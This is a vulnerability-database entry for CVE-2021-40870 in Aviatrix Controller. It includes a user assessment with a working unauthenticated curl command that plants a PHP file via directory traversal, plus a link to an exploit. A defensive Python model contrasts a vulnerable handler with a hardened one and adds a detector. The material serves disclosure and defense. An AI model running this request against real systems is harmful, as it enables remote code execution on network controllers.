AttackerKB AKB:E355AB47-21A0-4270-B1B7-31327C5DB3E0
History: Sep 13, 2021 - 12:00 a.m.

CVE-2021-40870

2021-09-13 00:00:00
attackerkb.com

CVSS2: 7.5
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3: 9.8
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score: 9.9
Confidence: High
EPSS: 0.933
Percentile: 99.1%

An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.

Recent assessments:

JoyGhoshs at October 09, 2021 6:33am UTC reported:

Description

This vulnerability allows an attacker to create and store a file on the Aviatrix controller. The exploitation phase doesn't need any user authentication, nor does it require any other user's interaction; it can simply be exploited using curl. Here is one example.

curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/poc.php -d 'data=hello<?php echo "Vulnerable Poc";?>'

# After executing the previous command, if the target is vulnerable, this will create a PHP file at this path:

https://vulnerable.target.com/v1/poc 

An attacker can do this unauthenticated because many API calls do not enforce a check for authentication. This allows an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem.

Or you can use this exploit to do the exploitation more easily: <https://github.com/JoyGhoshs/CVE-2021-40870>

Assessed Attacker Value: 3
Assessed Exploitation: 5
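The sink the assessment above describes, as an added illustrative model: a toy backend that splices account_name onto a metrics directory without a session check, beside a hardened handler and a small request-body detector. This is example code, not Aviatrix's implementation and not the poster's exploit; the directory layout, the session store, the (True/False, detail) return shape and the function names are assumptions, and the request body is constructed from the parameters the curl PoC on the page sends.

```python
"""Illustrative model of the unauthenticated file-write sink behind
CVE-2021-40870.  Not Aviatrix code: the directory layout, session store
and parameter handling are assumptions made for this example."""
import posixpath
from urllib.parse import parse_qs, urlencode

# Assumed layout of a toy controller install (not Aviatrix's real paths).
METRICS_DIR = "/opt/toy-controller/metrics"

# Assumed session store: the only CID the toy backend would accept.
VALID_SESSIONS = {"a1b2c3d4"}

# Constructed request body carrying the same parameters as the curl PoC.
POC_BODY = urlencode({
    "CID": "x",
    "action": "set_metric_gw_selections",
    "account_name": "/../../../var/www/php/poc.php",
    "data": 'hello<?php echo "Vulnerable Poc";?>',
})


def parse_body(body):
    """Flatten an application/x-www-form-urlencoded body into a dict of first values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def is_authenticated(params):
    """The check the vulnerable action skips: is CID a live session?"""
    return params.get("CID") in VALID_SESSIONS


def vulnerable_target(params):
    """Models the flaw.  No session check, and account_name is glued onto the
    directory with string concatenation, so every '/../' walks one level out of
    METRICS_DIR.  Returns the path the write would actually land on."""
    return posixpath.normpath(METRICS_DIR + "/" + params["account_name"])


def hardened_target(params):
    """Hardened handling.  Returns (True, path) when the write is allowed, else
    (False, reason).  Three independent gates: session, an allowlist on the
    account name, and a containment check on the resolved path."""
    if not is_authenticated(params):
        return False, "unauthenticated"
    name = params.get("account_name", "")
    # Allowlist rather than denylist: letters, digits, '-' and '_' only, so no
    # separators, no dots, no empty names.
    if not name or not all(c.isalnum() or c in "-_" for c in name):
        return False, "account_name rejected by allowlist"
    target = posixpath.normpath(posixpath.join(METRICS_DIR, name))
    # Containment check stays even though the allowlist already forbids '/',
    # so a later loosening of the allowlist cannot silently reopen traversal.
    if posixpath.commonpath([METRICS_DIR, target]) != METRICS_DIR:
        return False, "resolved path escapes METRICS_DIR"
    return True, target


def looks_like_cve_2021_40870(params):
    """Detection heuristic for captured request bodies: the vulnerable action
    with an account_name carrying a path separator or '..'."""
    name = params.get("account_name", "")
    return (params.get("action") == "set_metric_gw_selections"
            and ("/" in name or ".." in name))


if __name__ == "__main__":
    poc = parse_body(POC_BODY)
    print("authenticated:", is_authenticated(poc))
    print("vulnerable write lands at:", vulnerable_target(poc))
    print("hardened verdict:", hardened_target(poc))
    print("detector flags PoC:", looks_like_cve_2021_40870(poc))
```

Run it as a script to see the PoC body resolve to a path under /var/www (the toy equivalent of the web root) with the vulnerable handler, and be refused at the session gate by the hardened one. The detector only sees request bodies, so it is meant for a reverse proxy or WAF in front of the controller, not for ordinary access logs, which do not record POST parameters.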
